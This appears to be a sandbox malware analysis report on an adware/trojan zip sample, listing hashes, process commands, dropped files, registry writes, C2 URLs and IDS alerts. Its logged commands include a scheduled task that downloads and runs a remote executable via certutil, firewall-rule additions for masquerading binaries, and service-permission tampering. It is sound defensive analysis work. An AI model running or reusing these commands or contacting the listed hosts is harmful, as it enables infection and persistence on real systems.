| File name: | asdasdasdasdasdasd.zip |
| Full analysis: | https://app.any.run/tasks/68575cf8-5ab9-40ac-b38f-f7185d046286 |
| Verdict: | Malicious activity |
| Threats: | Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security. |
| Analysis date: | July 15, 2019, 08:11:09 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract |
| MD5: | 3964FC4F848BD14C61DCBC1C6C13831E |
| SHA1: | 58861CC92EE620AFF514ABD7F60F3A18E7F73B81 |
| SHA256: | 8FED15676E3B08CB78FE51BDBC55A0BAC963A4566B447D1C5EC9438A5E066A31 |
| SSDEEP: | 98304:Qju4ZtVHmuX3bQPQZQM2ma0qvg05wcoPmT7NRFxZwbo6DSb:H+tVGKrQ4DS0SzTo+TXZoo0A |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0009 |
| ZipCompression: | Unknown (99) |
| ZipModifyDate: | 1980:00:00 00:00:00 |
| ZipCRC: | 0x00000000 |
| ZipCompressedSize: | 3879935 |
| ZipUncompressedSize: | 5194752 |
| ZipFileName: | 185e92e899edc8da1a3639f85646ef9c55666c80029fa20d2dc1849b376446d9 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 748 | cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" | C:\Windows\system32\cmd.exe | — | 185e92e899edc8da1a3639f85646ef9c55666c80029fa20d2dc1849b376446d9.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 916 | "C:\Windows\system32\CompMgmtLauncher.exe" | C:\Windows\system32\CompMgmtLauncher.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Computer Management Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1264 | cmd.exe /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) | C:\Windows\system32\cmd.exe | — | csrss.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1340 | sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) | C:\Windows\system32\sc.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: A tool to aid in developing services for WindowsNT Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1672 | "C:\Users\admin\AppData\Local\Temp\csrss\cloudnet.exe" /31339 | C:\Users\admin\AppData\Local\Temp\csrss\cloudnet.exe | csrss.exe | ||||||||||||
User: admin Company: EpicNet Inc. Integrity Level: HIGH Description: Cloud Net Exit code: 0 Version: 7.2.1.1 Modules
| |||||||||||||||
| 1808 | sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) | C:\Windows\system32\sc.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: A tool to aid in developing services for WindowsNT Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2128 | C:\Windows\rss\csrss.exe "" | C:\Windows\rss\csrss.exe | 185e92e899edc8da1a3639f85646ef9c55666c80029fa20d2dc1849b376446d9.exe | ||||||||||||
User: SYSTEM Integrity Level: SYSTEM Exit code: 0 Modules
| |||||||||||||||
| 2140 | schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f http://proactor.xyz/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F | C:\Windows\system32\schtasks.exe | — | csrss.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2296 | netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes | C:\Windows\system32\netsh.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Network Command Shell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2312 | CompMgmtLauncher | C:\Windows\system32\CompMgmtLauncher.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Computer Management Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\70\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\asdasdasdasdasdasd.zip | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop | |||
| (PID) Process: | (3492) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface |
| Operation: | write | Name: | ShowPassword |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3492 | WinRAR.exe | C:\Users\admin\Desktop\185e92e899edc8da1a3639f85646ef9c55666c80029fa20d2dc1849b376446d9 | executable | |
MD5:— | SHA256:— | |||
| 2128 | csrss.exe | C:\Windows\windefender.exe | executable | |
MD5:— | SHA256:— | |||
| 1672 | cloudnet.exe | C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe | executable | |
MD5:— | SHA256:— | |||
| 2128 | csrss.exe | C:\Users\admin\AppData\Local\Temp\csrss\winboxls-0712.exe | executable | |
MD5:— | SHA256:— | |||
| 2488 | 185e92e899edc8da1a3639f85646ef9c55666c80029fa20d2dc1849b376446d9.exe | C:\Windows\rss\csrss.exe | executable | |
MD5:— | SHA256:— | |||
| 2128 | csrss.exe | C:\Users\admin\AppData\Local\Temp\csrss\cloudnet.exe | executable | |
MD5:— | SHA256:— | |||
| 2128 | csrss.exe | C:\Windows\System32\drivers\WinmonProcessMonitor.sys | executable | |
MD5:622FD523A87CB55BE0B676A70C64E8F8 | SHA256:F609C6656A0C451DAFA5173DF0CD848F7CB7F22C4F150F8D16716C12593DE66C | |||
| 2128 | csrss.exe | C:\Windows\System32\drivers\WinmonFS.sys | executable | |
MD5:0D3A8D67CD969C6E096B4D29E910DD9E | SHA256:EB0BE2AC3833C843214A55B14C31125A7B600D5272BDF322C4871F42627576E4 | |||
| 2128 | csrss.exe | C:\Windows\System32\drivers\Winmon.sys | executable | |
MD5:4EF0C39E632279D7B3672D2EFC071E5B | SHA256:889FB266C4C01BB4EF67635249C8DAEB641FC86CE62FC280B34BEEC415FB6129 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1672 | cloudnet.exe | GET | — | 136.243.14.152:80 | http://62514BA5-27D8-4264-B9E3-EA6258BDDDB7.server-4.qxzi.ru/update.php?uid=62514BA5-27D8-4264-B9E3-EA6258BDDDB7&version=20190714&OS=win6.1,x86&have_admin=1&mys=hdtraileren.com,qxzi.ru,rbnj.ru,trailerru.com&build=20170301&cpu=Intel(R)+Core(TM)+i5-6400+CPU+%40+2.70GHz&video=Standard+VGA+Graphics+Adapter&ram=3&campaign=31339 | DE | — | — | malicious |
2128 | csrss.exe | GET | 200 | 104.18.37.217:80 | http://nxtfdata.xyz/cl.exe | US | executable | 667 Kb | malicious |
2128 | csrss.exe | GET | 200 | 104.31.94.148:80 | http://proactor.xyz/app/watchdog.exe?t=2019-07-15 | US | executable | 1.37 Mb | suspicious |
1672 | cloudnet.exe | GET | 200 | 136.243.14.152:8000 | http://136.243.14.152:8000/stat?uptime=100&downlink=1111&uplink=1111&id=00103877&statpass=bpass&version=20190714&features=30&guid=62514BA5-27D8-4264-B9E3-EA6258BDDDB7&comment=20190714&p=0&s= | DE | text | 11 b | malicious |
2128 | csrss.exe | GET | 200 | 104.31.94.148:80 | http://proactor.xyz/app/winboxls-0712.exe | US | executable | 2.04 Mb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3232 | 185e92e899edc8da1a3639f85646ef9c55666c80029fa20d2dc1849b376446d9.exe | 104.26.14.130:443 | venoxcontrol.com | Cloudflare Inc | US | shared |
2128 | csrss.exe | 104.26.14.130:443 | venoxcontrol.com | Cloudflare Inc | US | shared |
2128 | csrss.exe | 104.31.94.148:80 | proactor.xyz | Cloudflare Inc | US | shared |
2128 | csrss.exe | 104.18.37.217:80 | nxtfdata.xyz | Cloudflare Inc | US | shared |
— | — | 136.243.14.152:8000 | 62514BA5-27D8-4264-B9E3-EA6258BDDDB7.server-4.qxzi.ru | Hetzner Online GmbH | DE | malicious |
1672 | cloudnet.exe | 136.243.14.152:80 | 62514BA5-27D8-4264-B9E3-EA6258BDDDB7.server-4.qxzi.ru | Hetzner Online GmbH | DE | malicious |
— | — | 136.243.14.152:444 | 62514BA5-27D8-4264-B9E3-EA6258BDDDB7.server-4.qxzi.ru | Hetzner Online GmbH | DE | malicious |
4092 | winboxls-0712.exe | 104.26.15.130:443 | venoxcontrol.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
|---|---|---|
venoxcontrol.com |
| unknown |
proactor.xyz |
| suspicious |
nxtfdata.xyz |
| malicious |
62514BA5-27D8-4264-B9E3-EA6258BDDDB7.server-4.qxzi.ru |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
2128 | csrss.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
2128 | csrss.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
2128 | csrss.exe | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
2128 | csrss.exe | Misc activity | ET INFO Packed Executable Download |
2128 | csrss.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2128 | csrss.exe | A Network Trojan was detected | ET TROJAN Possible JKDDOS download cl.exe |
2128 | csrss.exe | A Network Trojan was detected | ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 |
2128 | csrss.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
2128 | csrss.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
2128 | csrss.exe | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |